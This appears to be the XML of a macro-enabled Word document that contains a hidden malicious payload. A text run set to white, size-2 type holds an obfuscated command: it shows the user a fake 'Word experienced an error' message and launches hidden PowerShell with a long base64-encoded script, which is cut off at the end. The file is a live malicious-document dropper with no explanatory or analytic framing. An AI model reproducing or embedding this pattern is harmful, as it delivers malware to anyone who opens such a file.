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vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject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941060" cy="26993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color w:val="FFFFFF"/>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t>]e1r[S]e1r[Sc]e1r[Sm]e1r[Sd]e1r[S ]e1r[Sc]e1r[Sm]e1r[Sd]e1r[S ]e1r[Sc]e1r[Sm]e1r[Sd]e1r[S ]e1r[Sc]e1r[Sm]e1r[Sd]e1r[S ]e1r[S/]e1r[Sc]e1r[S ]e1r[Sm]e1r[Ss]e1r[Sg]e1r[S ]e1r[S%]e1r[Su]e1r[Ss]e1r[Se]e1r[Sr]e1r[Sn]e1r[Sa]e1r[Sm]e1r[Se]e1r[S%]e1r[S ]e1r[S/]e1r[Sv]e1r[S ]e1r[SW]e1r[So]e1r[Sr]e1r[Sd]e1r[S ]e1r[Se]e1r[Sx]e1r[Sp]e1r[Se]e1r[Sr]e1r[Si]e1r[Se]e1r[Sn]e1r[Sc]e1r[Se]e1r[Sd]e1r[S ]e1r[Sa]e1r[Sn]e1r[S ]e1r[Se]e1r[Sr]e1r[Sr]e1r[So]e1r[Sr]e1r[S ]e1r[St]e1r[Sr]e1r[Sy]e1r[Si]e1r[Sn]e1r[Sg]e1r[S ]e1r[St]e1r[So]e1r[S ]e1r[So]e1r[Sp]e1r[Se]e1r[Sn]e1r[S ]e1r[St]e1r[Sh]e1r[Se]e1r[S ]e1r[Sf]e1r[Si]e1r[Sl]e1r[Se]e1r[S.]e1r[S ]e1r[S&amp;]e1r[S ]e1r[S ]e1r[SP]e1r[S^]e1r[SO]e1r[Sw]e1r[S^]e1r[Se]e1r[Sr]e1r[S^]e1r[Ss]e1r[Sh]e1r[Se]e1r[S^]e1r[SL]e1r[S^]e1r[SL]e1r[S ]e1r[S-]e1r[Sw]e1r[S ]e1r[Sh]e1r[Si]e1r[Sd]e1r[Sd]e1r[Se]e1r[Sn]e1r[S ]e1r[S-]e1r[SE]e1r[SN]e1r[SC]e1r[SO]e1r[SD]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S ]e1r[S IA]e1r[SAg]e1r[SAH]e1r[SMA]e1r[SZQ]e1r[SB0]e1r[SAC]e1r[S0A]e1r[Sdg]e1r[SBh]e1r[SAF]e1r[SIA]e1r[SSQ]e1r[SBh]e1r[SAG]e1r[SIA]e1r[STA]e1r[SBl]e1r[SAC]e1r[SAA]e1r[SIA]e1r[SA4]e1r[SAH]e1r[SkA]e1r[SZQ]e1r[SAg]e1r[SAC]e1r[SgA]e1r[SWw]e1r[SB0]e1r[SAF]e1r[SkA]e1r[ScA]e1r[SBF]e1r[SAF]e1r[S0A]e1r[SKA]e1r[SAi]e1r[SAH]e1r[SsA]e1r[SMA]e1r[SB9]e1r[SAH]e1r[SsA]e1r[SMg]e1r[SB9]e1r[SAH]e1r[SsA]e1r[SNA]e1r[SB9]e1r[SAH]e1r[SsA]e1r[SMw]e1r[SB9]e1r[SAH]e1r[SsA]e1r[SMQ]e1r[SB9]e1r[SAC]e1r[SIA]e1r[SLQ]e1r[SBG]e1r[SAC]e1r[ScA]e1r[Scw]e1r[SBZ]e1r[SAH]e1r[SMA]e1r[SdA]e1r[SBF]e1r[SAC]e1r[ScA]e1r[SLA]e1r[SAn]e1r[SAH]e1r[SIA]e1r[SWQ]e1r[SAn]e1r[SAC]e1r[SwA]e1r[SJw]e1r[SBN]e1r[SAC]e1r[S4A]e1r[SJw]e1r[SAs]e1r[SAC]e1r[ScA]e1r[SRQ]e1r[SBj]e1r[SAF]e1r[SQA]e1r[STw]e1r[SAn]e1r[SAC]e1r[SwA]e1r[SJw]e1r[SBJ]e1r[SAE]e1r[S8A]e1r[SLg]e1r[SBk]e1r[SAE]e1r[SkA]e1r[SUg]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAg]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAg]e1r[SAD]e1r[SsA]e1r[SIA]e1r[SAg]e1r[SAF]e1r[SMA]e1r[Sdg]e1r[SAg]e1r[SAC]e1r[SgA]e1r[SIg]e1r[SBw]e1r[SAC]e1r[SIA]e1r[SKw]e1r[SAi]e1r[SAG]e1r[SwA]e1r[SdA]e1r[SAi]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAo]e1r[SAC]e1r[SAA]e1r[SIA]e1r[SBb]e1r[SAF]e1r[SQA]e1r[SeQ]e1r[SBw]e1r[SAG]e1r[SUA]e1r[SXQ]e1r[SAo]e1r[SAC]e1r[SIA]e1r[Sew]e1r[SA0]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SA2]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SA1]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SAx]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SAw]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SAz]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SA3]e1r[SAH]e1r[S0A]e1r[Sew]e1r[SAy]e1r[SAH]e1r[S0A]e1r[SIg]e1r[SAg]e1r[SAC]e1r[S0A]e1r[SZg]e1r[SAn]e1r[SAE]e1r[SUA]e1r[SJw]e1r[SAs]e1r[SAC]e1r[ScA]e1r[SVg]e1r[SBJ]e1r[SAG]e1r[SMA]e1r[SJw]e1r[SAs]e1r[SAC]e1r[ScA]e1r[SbQ]e1r[SBh]e1r[SAG]e1r[S4A]e1r[SYQ]e1r[SBH]e1r[SAE]e1r[SUA]e1r[Scg]e1r[SAn]e1r[SAC]e1r[SwA]e1r[SJw]e1r[SBw]e1r[SAC]e1r[ScA]e1r[SLA]e1r[SAn]e1r[SAH]e1r[SMA]e1r[SeQ]e1r[SBz]e1r[SAH]e1r[SQA]e1r[SZQ]e1r[SAn]e1r[SAC]e1r[SwA]e1r[SJw]e1r[SBS]e1r[SAC]e1r[ScA]e1r[SLA]e1r[SAn]e1r[SAG]e1r[S0A]e1r[SLg]e1r[SBu]e1r[SAE]e1r[SUA]e1r[SVA]e1r[SAu]e1r[SAH]e1r[SMA]e1r[SZQ]e1r[SAn]e1r[SAC]e1r[SwA]e1r[SJw]e1r[SBv]e1r[SAG]e1r[SkA]e1r[STg]e1r[SB0]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAg]e1r[SAC]e1r[SAA]e1r[SKQ]e1r[SAg]e1r[SAD]e1r[SsA]e1r[SIA]e1r[SAg]e1r[SAC]e1r[SQA]e1r[SRQ]e1r[SBy]e1r[SAH]e1r[SIA]e1r[Sbw]e1r[SBy]e1r[SAE]e1r[SEA]e1r[SYw]e1r[SB0]e1r[SAG]e1r[SkA]e1r[Sbw]e1r[SBu]e1r[SAF]e1r[SAA]e1r[Scg]e1r[SBl]e1r[SAG]e1r[SYA]e1r[SZQ]e1r[SBy]e1r[SAG]e1r[SUA]e1r[Sbg]e1r[SBj]e1r[SAG]e1r[SUA]e1r[SIA]e1r[SA9]e1r[SAC]e1r[SAA]e1r[SKA]e1r[SAn]e1r[SAF]e1r[SMA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBp]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SwA]e1r[SZQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[S4A]e1r[SdA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAG]e1r[SwA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SeQ]e1r[SBD]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[S4A]e1r[SdA]e1r[SBp]e1r[SAG]e1r[S4A]e1r[SdQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBl]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBa]e1r[SAH]e1r[SkA]e1r[SOQ]e1r[SAz]e1r[SAD]e1r[SIA]e1r[SNA]e1r[SBy]e1r[SAD]e1r[S0A]e1r[SJA]e1r[SBY]e1r[SAD]e1r[ScA]e1r[SMA]e1r[SBI]e1r[SAC]e1r[SAA]e1r[SKw]e1r[SAg]e1r[SAF]e1r[SsA]e1r[SYw]e1r[SBo]e1r[SAG]e1r[SEA]e1r[Scg]e1r[SBd]e1r[SAC]e1r[SgA]e1r[SNg]e1r[SA0]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAr]e1r[SAC]e1r[SAA]e1r[SJA]e1r[SBI]e1r[SAD]e1r[SYA]e1r[SOA]e1r[SBT]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBU]e1r[SAD]e1r[SYA]e1r[SNg]e1r[SBG]e1r[SAD]e1r[S0A]e1r[SKA]e1r[SAn]e1r[SAE]e1r[SsA]e1r[SNw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SA0]e1r[SAF]e1r[SUA]e1r[SJw]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SIA]e1r[SAo]e1r[SAG]e1r[ScA]e1r[SRQ]e1r[SBU]e1r[SAC]e1r[S0A]e1r[Sdg]e1r[SBB]e1r[SAF]e1r[SIA]e1r[SaQ]e1r[SBB]e1r[SAG]e1r[SIA]e1r[SbA]e1r[SBF]e1r[SAC]e1r[SAA]e1r[SOA]e1r[SBZ]e1r[SAE]e1r[SUA]e1r[SIA]e1r[SAp]e1r[SAC]e1r[S4A]e1r[Sdg]e1r[SBh]e1r[SAG]e1r[SwA]e1r[SVQ]e1r[SBl]e1r[SAD]e1r[SoA]e1r[SOg]e1r[SAi]e1r[SAG]e1r[SMA]e1r[SUg]e1r[SBg]e1r[SAG]e1r[SUA]e1r[SQQ]e1r[SBg]e1r[SAF]e1r[SQA]e1r[SZQ]e1r[SBE]e1r[SAE]e1r[SkA]e1r[Scg]e1r[SBF]e1r[SAG]e1r[SMA]e1r[SYA]e1r[SBU]e1r[SAG]e1r[S8A]e1r[SUg]e1r[SB5]e1r[SAC]e1r[SIA]e1r[SKA]e1r[SAk]e1r[SAE]e1r[SgA]e1r[STw]e1r[SBN]e1r[SAE]e1r[SUA]e1r[SIA]e1r[SAr]e1r[SAC]e1r[SAA]e1r[SKA]e1r[SAo]e1r[SAC]e1r[ScA]e1r[Sew]e1r[SAw]e1r[SAH]e1r[S0A]e1r[SSg]e1r[SB4]e1r[SAG]e1r[SsA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SNA]e1r[SBq]e1r[SAH]e1r[SIA]e1r[SXw]e1r[SB7]e1r[SAD]e1r[SAA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SfQ]e1r[SBE]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SaA]e1r[SB1]e1r[SAG]e1r[SwA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Sag]e1r[SBn]e1r[SAH]e1r[SoA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SB7]e1r[SAD]e1r[SAA]e1r[SfQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAt]e1r[SAE]e1r[SYA]e1r[SWw]e1r[SBj]e1r[SAE]e1r[SgA]e1r[SQQ]e1r[SBy]e1r[SAF]e1r[S0A]e1r[SOQ]e1r[SAy]e1r[SAC]e1r[SkA]e1r[SKQ]e1r[SA7]e1r[SAC]e1r[SQA]e1r[SWA]e1r[SA2]e1r[SAD]e1r[SAA]e1r[STQ]e1r[SA9]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBJ]e1r[SAD]e1r[ScA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SXw]e1r[SBC]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SA7]e1r[SAC]e1r[SAA]e1r[SIA]e1r[SAo]e1r[SAC]e1r[SAA]e1r[SIA]e1r[SBW]e1r[SAG]e1r[SEA]e1r[SUg]e1r[SBp]e1r[SAG]e1r[SEA]e1r[SYg]e1r[SBs]e1r[SAE]e1r[SUA]e1r[SIA]e1r[SAo]e1r[SAC]e1r[SIA]e1r[SUA]e1r[SAi]e1r[SAC]e1r[SsA]e1r[SIg]e1r[SBM]e1r[SAH]e1r[SQA]e1r[SIg]e1r[SAp]e1r[SAC]e1r[SAA]e1r[SIA]e1r[SAp]e1r[SAC]e1r[S4A]e1r[Sdg]e1r[SBB]e1r[SAG]e1r[SwA]e1r[SVQ]e1r[SBF]e1r[SAD]e1r[SoA]e1r[SOg]e1r[SAi]e1r[SAF]e1r[SMA]e1r[SZQ]e1r[SBj]e1r[SAF]e1r[SUA]e1r[Scg]e1r[SBp]e1r[SAH]e1r[SQA]e1r[SWQ]e1r[SBQ]e1r[SAH]e1r[SIA]e1r[STw]e1r[SBU]e1r[SAG]e1r[SAA]e1r[Sbw]e1r[SBj]e1r[SAG]e1r[SAA]e1r[STw]e1r[SBs]e1r[SAC]e1r[SIA]e1r[SIA]e1r[SA9]e1r[SAC]e1r[SAA]e1r[SKA]e1r[SAn]e1r[SAF]e1r[SQA]e1r[SbA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAH]e1r[SMA]e1r[SMQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAy]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBG]e1r[SAD]e1r[SAA]e1r[SXw]e1r[SBY]e1r[SAD]e1r[S0A]e1r[SKA]e1r[SAn]e1r[SAE]e1r[SUA]e1r[SMA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAy]e1r[SAF]e1r[SAA]e1r[SJw]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBa]e1r[SAG]e1r[SEA]e1r[SYw]e1r[SAy]e1r[SAG]e1r[ScA]e1r[Sdw]e1r[SBz]e1r[SAC]e1r[SAA]e1r[SPQ]e1r[SAg]e1r[SAC]e1r[SgA]e1r[SKA]e1r[SAn]e1r[SAE]e1r[SQA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SNw]e1r[SAx]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SSg]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SOw]e1r[SAk]e1r[SAE]e1r[S0A]e1r[SMw]e1r[SBf]e1r[SAE]e1r[SEA]e1r[SPQ]e1r[SAo]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBV]e1r[SAF]e1r[S8A]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SNQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAn]e1r[SAE]e1r[S8A]e1r[SJw]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBG]e1r[SAG]e1r[SEA]e1r[SZw]e1r[SBl]e1r[SAD]e1r[SQA]e1r[SZw]e1r[SBq]e1r[SAD]e1r[S0A]e1r[SJA]e1r[SBI]e1r[SAE]e1r[S8A]e1r[STQ]e1r[SBF]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAo]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBl]e1r[SAE]e1r[S0A]e1r[ScQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBK]e1r[SAH]e1r[SgA]e1r[Saw]e1r[SA0]e1r[SAG]e1r[SoA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Scg]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SXw]e1r[SBl]e1r[SAE]e1r[S0A]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[ScQ]e1r[SBE]e1r[SAG]e1r[SgA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAH]e1r[SUA]e1r[SbA]e1r[SBq]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[ScA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SB6]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SZQ]e1r[SBN]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAH]e1r[SEA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SkA]e1r[SIA]e1r[SAt]e1r[SAH]e1r[SIA]e1r[SRQ]e1r[SBw]e1r[SAE]e1r[SwA]e1r[SQQ]e1r[SBj]e1r[SAG]e1r[SUA]e1r[SIA]e1r[SAg]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBl]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAE]e1r[S0A]e1r[ScQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SLA]e1r[SBb]e1r[SAG]e1r[SMA]e1r[SSA]e1r[SBB]e1r[SAF]e1r[SIA]e1r[SXQ]e1r[SA5]e1r[SAD]e1r[SIA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SQA]e1r[SWg]e1r[SBh]e1r[SAG]e1r[SMA]e1r[SMg]e1r[SBn]e1r[SAH]e1r[ScA]e1r[Scw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SKA]e1r[SAn]e1r[SAC]e1r[S4A]e1r[SZA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBs]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SbA]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SOw]e1r[SAk]e1r[SAE]e1r[SwA]e1r[SOQ]e1r[SA1]e1r[SAE]e1r[ScA]e1r[SPQ]e1r[SAo]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBS]e1r[SAD]e1r[SYA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SNw]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAn]e1r[SAE]e1r[S4A]e1r[SJw]e1r[SAp]e1r[SAD]e1r[SsA]e1r[SJA]e1r[SBF]e1r[SAG]e1r[ScA]e1r[Seg]e1r[SA3]e1r[SAG]e1r[S0A]e1r[SbA]e1r[SBh]e1r[SAD]e1r[S0A]e1r[SKA]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SXQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBl]e1r[SAD]e1r[SEA]e1r[Scg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBb]e1r[SAF]e1r[SMA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAD]e1r[SoA]e1r[SLw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAv]e1r[SAH]e1r[SMA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAH]e1r[ScA]e1r[SaQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBm]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SB0]e1r[SAG]e1r[SwA]e1r[Sbw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBn]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SkA]e1r[Scw]e1r[SB0]e1r[SAG]e1r[SkA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBj]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAH]e1r[SMA]e1r[SZQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAG]e1r[ScA]e1r[SLg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBj]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Sbw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAG]e1r[S0A]e1r[SLw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SB3]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[ScA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAC]e1r[S0A]e1r[SYQ]e1r[SBk]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[S0A]e1r[SaQ]e1r[SBu]e1r[SAC]e1r[S8A]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAF]e1r[SYA]e1r[SRQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SA5]e1r[SAG]e1r[SgA]e1r[SMA]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SoA]e1r[Sag]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAC]e1r[S8A]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SQA]e1r[SBd]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBl]e1r[SAD]e1r[SEA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Scg]e1r[SBb]e1r[SAF]e1r[SMA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAD]e1r[SoA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SLw]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBz]e1r[SAG]e1r[SEA]e1r[SaA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBs]e1r[SAG]e1r[SEA]e1r[SLQ]e1r[SBh]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SQA]e1r[SLg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBj]e1r[SAG]e1r[S8A]e1r[SbQ]e1r[SAv]e1r[SAH]e1r[ScA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[ScA]e1r[SAt]e1r[SAG]e1r[SMA]e1r[Sbw]e1r[SBu]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAH]e1r[SQA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBl]e1r[SAG]e1r[S4A]e1r[SJw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SB0]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAC]e1r[S8A]e1r[SYQ]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SQA]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBd]e1r[SAG]e1r[SUA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SAx]e1r[SAH]e1r[SIA]e1r[SWw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBT]e1r[SAD]e1r[SoA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAC]e1r[S8A]e1r[SbQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAH]e1r[SkA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[ScA]e1r[SBo]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SYQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBt]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[Sag]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBh]e1r[SAH]e1r[SAA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAG]e1r[SEA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Sbg]e1r[SAu]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBj]e1r[SAG]e1r[S8A]e1r[SbQ]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SQA]e1r[SdQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBw]e1r[SAC]e1r[S0A]e1r[SaQ]e1r[SBu]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Scw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SB0]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SEA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBs]e1r[SAG]e1r[SwA]e1r[SZQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBy]e1r[SAC]e1r[S8A]e1r[SZA]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SYg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAv]e1r[SAE]e1r[SAA]e1r[SXQ]e1r[SBl]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SAx]e1r[SAH]e1r[SIA]e1r[SWw]e1r[SBT]e1r[SAH]e1r[SMA]e1r[SOg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAC]e1r[S8A]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBi]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SEA]e1r[SJw]e1r[SAr]e1r[SAC]e1r[SgA]e1r[SJw]e1r[SBu]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[SQA]e1r[SYQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[Scg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBh]e1r[SAG]e1r[SIA]e1r[SYg]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SYQ]e1r[SBk]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAC]e1r[S4A]e1r[SYw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[S0A]e1r[SLw]e1r[SB3]e1r[SAH]e1r[SAA]e1r[SJw]e1r[SAp]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAC]e1r[S0A]e1r[SJw]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SYQ]e1r[SBk]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SbQ]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBp]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAG]e1r[S4A]e1r[SLw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SKA]e1r[SAn]e1r[SAE]e1r[SwA]e1r[Sbw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SA1]e1r[SAG]e1r[SsA]e1r[SRQ]e1r[SAn]e1r[SAC]e1r[SkA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SYQ]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAn]e1r[SAE]e1r[SAA]e1r[SXQ]e1r[SBl]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[SMQ]e1r[SBy]e1r[SAC]e1r[ScA]e1r[SKw]e1r[SAo]e1r[SAC]e1r[ScA]e1r[SWw]e1r[SBT]e1r[SAD]e1r[SoA]e1r[SLw]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SAv]e1r[SAC]e1r[ScA]e1r[SKQ]e1r[SAr]e1r[SAC]e1r[ScA]e1r[Sbg]e1r[SAn]e1r[SAC]e1r[SsA]e1r[SJw]e1r[SBn]e1r[SAC]e1r[ScA]e1r[S